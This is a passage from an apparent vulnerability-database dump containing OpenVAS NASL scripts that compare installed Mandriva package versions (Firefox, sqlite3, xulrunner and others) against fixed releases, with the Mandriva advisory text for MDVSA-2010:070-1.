((res = isrpmvuln(pkg:\"lib64ggadget-gtk1.0_0\", rpm:\"lib64ggadget-gtk1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-qt1.0_0\", rpm:\"lib64ggadget-qt1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64google-gadgets-devel\", rpm:\"lib64google-gadgets-devel~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc2\", rpm:\"lib64opensc2~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc-devel\", rpm:\"lib64opensc-devel~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.24.0~3.16mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.19.1~20.15mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-17T11:05:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0176", "CVE-2010-0165", "CVE-2010-0168", "CVE-2010-0174", "CVE-2010-0172", "CVE-2010-0175", "CVE-2010-0170", "CVE-2010-0167", "CVE-2010-1122", "CVE-2010-0164", "CVE-2010-0173", "CVE-2010-0178", "CVE-2010-0177", "CVE-2009-3555", "CVE-2010-0182", "CVE-2010-0181", "CVE-2010-1028", "CVE-2010-0179"], "description": "Check for the Version of firefox", "modified": "2018-01-16T00:00:00", "published": "2010-04-29T00:00:00", "id": "OPENVAS:1361412562310831006", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831006", "type": "openvas", "title": "Mandriva Update for firefox MDVSA-2010:070-1 (firefox)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for firefox MDVSA-2010:070-1 (firefox)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security issues were identified and fixed in firefox:\n\n Security researcher regenrecht reported (via TippingPoint's Zero Day\n Initiative) a potential reuse of a deleted image frame in Firefox 3.6's\n handling of multipart/x-mixed-replace images. Although no exploit was\n shown, re-use of freed memory has led to exploitable vulnerabilities\n in the past (CVE-2010-0164).\n \n Mozilla developers identified and fixed several stability bugs in the\n browser engine used in Firefox and other Mozilla-based products. Some\n of these crashes showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at least some\n of these could be exploited to run arbitrary code (CVE-2010-0165,\n CVE-2010-0167).\n \n Mozilla developer Josh Soref of Nokia reported that documents\n failed to call certain security checks when attempting to preload\n images. Although the image content is not available to the page, it\n is possible to specify protocols that are normally not allowed in a\n web page such as file:. This includes internal schemes implemented\n by add-ons that might perform privileged actions resulting in\n something like a Cross-Site Request Forgery (CSRF) attack against\n the add-on. Potential severity would depend on the add-ons installed\n (CVE-2010-0168).\n \n Mozilla developer Blake Kaplan reported that the window.location object\n was made a normal overridable JavaScript object in the Firefox 3.6\n browser engine (Gecko 1.9.2) because new mechanisms were developed\n to enforce the same-origin policy between windows and frames. This\n object is unfortunately also used by some plugins to determine the page\n origin used for access restrictions. A malicious page could override\n this object to fool a plugin into granting access to data on another\n site or the local file system. The behavior of older Firefox versions\n has been restored (CVE-2010-0170).\n \n Mozilla developer Justin Dolske reported that the new asynchronous\n Authorization Prompt (HTTP username and password) was not always\n attached to the correct window. Although we have not demonstrated\n this, it may be possible for a malicious page to convince a user\n to open a new tab or popup to a trusted service and then have the\n HTTP authorization prompt from the malicious page appear to be the\n login prompt for the trusted page. This potential attack is greatly\n mitigated by the fact that very few web sites use HTTP authorization,\n preferring instead to use web forms and cookies (CVE-2010-0172).\n \n Unspecified vulnerability in Mozilla Firefox 3.5.x ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"firefox on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00036.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831006\");\n script_version(\"$Revision: 8438 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-16 18:38:23 +0100 (Tue, 16 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-29 13:13:58 +0200 (Thu, 29 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:070-1\");\n script_cve_id(\"CVE-2010-0164\", \"CVE-2010-0165\", \"CVE-2010-0167\", \"CVE-2010-0168\", \"CVE-2010-0170\", \"CVE-2010-0172\", \"CVE-2010-1028\", \"CVE-2010-1122\", \"CVE-2010-0173\", \"CVE-2010-0174\", \"CVE-2010-0175\", \"CVE-2010-0176\", \"CVE-2010-0177\", \"CVE-2010-0178\", \"CVE-2010-0179\", \"CVE-2010-0181\", \"CVE-2010-0182\", \"CVE-2009-3555\");\n script_name(\"Mandriva Update for firefox MDVSA-2010:070-1 (firefox)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"beagle\", rpm:\"beagle~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-crawl-system\", rpm:\"beagle-crawl-system~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-doc\", rpm:\"beagle-doc~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-epiphany\", rpm:\"beagle-epiphany~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-evolution\", rpm:\"beagle-evolution~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui\", rpm:\"beagle-gui~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui-qt\", rpm:\"beagle-gui-qt~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-libs\", rpm:\"beagle-libs~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"devhelp\", rpm:\"devhelp~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"devhelp-plugins\", rpm:\"devhelp-plugins~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"epiphany\", rpm:\"epiphany~2.24.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"epiphany-devel\", rpm:\"epiphany-devel~2.24.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != 